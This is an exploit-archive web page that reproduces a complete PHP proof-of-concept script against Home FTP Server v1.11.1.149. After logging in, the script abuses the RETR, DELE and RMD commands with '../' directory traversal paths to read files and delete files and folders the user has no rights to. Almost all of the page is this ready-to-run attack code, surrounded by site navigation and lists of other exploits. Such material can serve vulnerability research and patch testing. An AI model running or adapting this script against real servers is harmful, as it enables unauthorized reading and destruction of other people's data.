首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Home FTP Server v1.11.1.149 RETR DELE RMD Remote Directory Traversal Exploit
来源:inv0ked.israel@gmail.com 作者:Pr0T3cT10n 发布时间:2010-11-01  

<?php
#     _             ____  __            __    ___
#    (_)____ _   __/ __ \/ /_____  ____/ /  _/_/ |
#   / // __ \ | / / / / / //_/ _ \/ __  /  / / / /
#  / // / / / |/ / /_/ / ,< /  __/ /_/ /  / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/  / /_/_/ 
#                   Live by the byte     |_/_/ 
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# The following is a proof of concept exploit for a path traversal vulnerability that exists in Home FTP Server.
# The vulnerability allows an unprivileged attacker to read files and delete files & folders whom he has no permissions to.
# The vulnerable FTP commands are:
# * RETR  - Read File
# * DELE  - Delete File
# * RMD  - Remove Directory
#-----------------------------------
# Exploit Title: Home FTP Server v1.11.1.149 Remote Directory Traversal Exploit
# Date: 31/10/2010
# Author: Pr0T3cT10n
# Software Link: http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe
# Affected Version: 1.11.1.149
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
###

error_reporting(E_ALL);
if(count($argv) <= 4) {
 echo("\r\n# Usage: {$argv[0]} [HOST] [PORT] [USER] [PASS]\r\n");
 echo("\tHOST - An host using Home FTP Server\r\n");
 echo("\tPORT - Default is 21\r\n");
 echo("\tUSER - Username\r\n");
 echo("\tPASS - Password\r\n");
 exit("\r\n");
} else {
 $CMD = '';
 $CFG = Array('file' => $argv[0], 'host' => $argv[1], 'port' => $argv[2], 'user' => $argv[3], 'pass' => $argv[4]);
 $sock = fsockopen($CFG['host'], $CFG['port'], $errno, $errstr, 5);
 if($sock) {
  echo("(+) Connected to the FTP server at '{$CFG['host']}' on port {$CFG['port']}\r\n");
  $read = fread($sock, 1024);
  fwrite($sock, "USER {$CFG['user']}\r\n");
  $read = fread($sock, 1024);
  fwrite($sock, "PASS {$CFG['pass']}\r\n");
  $read = fread($sock, 1024);
  echo("(~) What would you like to do?\r\n\t1.Remove File\r\n\t2.Remove Directory\r\n\t3.Read File\r\n");
  $CHSE = rtrim(fgets(STDIN));
  if($CHSE == 1) {
   $CMD.= "DELE";
   echo("(~) Path to file(for example: ../../../test.txt): ");
   $PATH = rtrim(fgets(STDIN));
   if($PATH != '') {
    fwrite($sock, "{$CMD} {$PATH}\r\n");
    echo(fread($sock, 1024));
   } else {
    exit("(-) Empty path.\r\n");
   }
  } elseif($CHSE == 2) {
   $CMD.= "RMD";
   echo("(~) Path to directory(for example: ../../../test): ");
   $PATH = rtrim(fgets(STDIN));
   if($PATH != '') {
    fwrite($sock, "{$CMD} {$PATH}\r\n");
    echo(fread($sock, 1024));
   } else {
    exit("(-) Empty path.\r\n");
   }
  } elseif($CHSE == 3) {
   $CMD.= "RETR";
   echo("(~) Path to file(for example: ../../../test.txt): ");
   $PATH = rtrim(fgets(STDIN));
   if($PATH != '') {
    fwrite($sock, "PASV\r\n");
    $read = fread($sock, 1024);
    $xpld = explode(',', $read);
    $addr_tmp = explode('(', $xpld[0]);
    $address = "{$addr_tmp[1]}.{$xpld[1]}.{$xpld[2]}.{$xpld[3]}";
    $port_tmp = explode(')', $xpld[5]);
    $newport = ($xpld[4]*256)+$port_tmp[0];
    fwrite($sock, "{$CMD} {$PATH}\r\n");
    $read = fread($sock, 1024);
    $socket = fsockopen($address, $newport, $errno, $errstr, 5);
    if($socket) {
     echo(fread($socket, 1024));
    }
   } else {
    exit("(-) Empty path.\r\n");
   }
  } else {
   exit("(-) You have to choose correctly.\r\n");
  }
 } else {
  exit("(-) Unable to connect to {$CFG['host']}:{$CFG['port']}\r\n");
 }
}
?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·yPlay v2.4.5 Denial of Service
·SmallFTPD v1.0.3 Remote Direct
·RoSPORA <= 1.5.0 Remote PHP Co
·MetInfo 2.0 PHP Code Injection
·Firefox 3.6.8 - 3.6.11 Interle
·MetInfo 3.0 PHP Code Injection
·mygamingladder MGL Combo Syste
·Buffy v1.3 Remote Directory Tr
·PHPKit <= 1.6.1 R2 overview.ph
·Auto CMS <= 1.8 Remote Code Ex
·Debian <=5.0.6 /Ubuntu <=10.04
·Linux kernel arbitrary write m
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved